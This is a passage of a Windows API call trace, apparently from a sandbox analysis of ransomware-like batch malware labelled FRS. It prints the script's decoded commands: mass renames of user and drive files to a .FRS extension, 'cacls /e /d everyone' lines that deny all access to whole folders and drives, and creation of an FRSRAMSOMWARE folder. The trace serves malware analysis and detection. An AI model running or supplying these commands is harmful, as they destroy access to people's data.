nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.113] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0141.113] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n") returned 48 [0141.114] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0141.114] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.114] GetFileType (hFile=0x2e8) returned 0x1 [0141.114] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0141.114] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.114] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0141.114] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 35 [0141.114] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0141.114] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.114] GetFileType (hFile=0x2e8) returned 0x1 [0141.114] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0141.114] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.114] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0141.114] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 22 [0141.114] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0141.114] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.114] GetFileType (hFile=0x2e8) returned 0x1 [0141.114] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0141.114] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.114] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0141.114] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n") returned 22 [0141.114] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0141.114] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.114] GetFileType (hFile=0x2e8) returned 0x1 [0141.114] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0141.114] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.115] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0141.115] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n") returned 22 [0141.115] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0141.115] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.115] GetFileType (hFile=0x2e8) returned 0x1 [0141.115] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0141.115] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.115] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0141.115] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n") returned 22 [0141.115] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0141.115] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.115] GetFileType (hFile=0x2e8) returned 0x1 [0141.115] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0141.115] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.115] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0141.115] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0141.115] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0141.115] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.115] GetFileType (hFile=0x2e8) returned 0x1 [0141.115] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0141.115] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.115] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0141.115] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0141.115] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0141.115] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.115] GetFileType (hFile=0x2e8) returned 0x1 [0141.115] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0141.116] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.116] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0141.116] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n") returned 61 [0141.116] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0141.116] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.116] GetFileType (hFile=0x2e8) returned 0x1 [0141.116] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0141.116] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.116] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0141.116] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n") returned 65 [0141.116] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0141.116] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.116] GetFileType (hFile=0x2e8) returned 0x1 [0141.116] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0141.116] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.116] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0141.116] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n") returned 64 [0141.116] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0141.116] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.116] GetFileType (hFile=0x2e8) returned 0x1 [0141.116] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0141.116] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.116] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0141.116] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n") returned 62 [0141.116] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0141.116] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.116] GetFileType (hFile=0x2e8) returned 0x1 [0141.116] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0141.117] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.117] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0141.117] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n") returned 64 [0141.117] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0141.117] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.117] GetFileType (hFile=0x2e8) returned 0x1 [0141.117] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0141.117] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.117] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0141.117] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n") returned 51 [0141.117] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0141.117] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.117] GetFileType (hFile=0x2e8) returned 0x1 [0141.117] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0141.117] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.117] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0141.117] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n") returned 52 [0141.117] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0141.117] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.117] GetFileType (hFile=0x2e8) returned 0x1 [0141.117] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0141.117] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.117] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0141.117] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\n") returned 38 [0141.117] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0141.117] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.117] GetFileType (hFile=0x2e8) returned 0x1 [0141.118] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0141.118] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.118] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0141.118] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n") returned 38 [0141.118] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0141.118] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.118] GetFileType (hFile=0x2e8) returned 0x1 [0141.118] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0141.118] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.118] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0141.118] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n") returned 38 [0141.118] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0141.118] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.118] GetFileType (hFile=0x2e8) returned 0x1 [0141.118] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0141.118] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.118] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0141.118] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n") returned 38 [0141.118] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0141.118] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.118] GetFileType (hFile=0x2e8) returned 0x1 [0141.118] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0141.118] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.118] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0141.118] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n") returned 8 [0141.118] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0141.119] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.119] GetFileType (hFile=0x2e8) returned 0x1 [0141.119] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0141.119] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.119] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0141.119] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 3\r\n") returned 2 [0141.119] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0141.119] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.119] GetFileType (hFile=0x2e8) returned 0x1 [0141.119] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0141.119] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.119] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0141.119] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n 3\r\n") returned 4 [0141.119] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0141.119] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.119] GetFileType (hFile=0x2e8) returned 0x1 [0141.119] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0141.119] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.119] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0141.119] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d everyone\r\n") returned 21 [0141.119] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0141.119] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.119] GetFileType (hFile=0x2e8) returned 0x1 [0141.119] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0141.119] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, 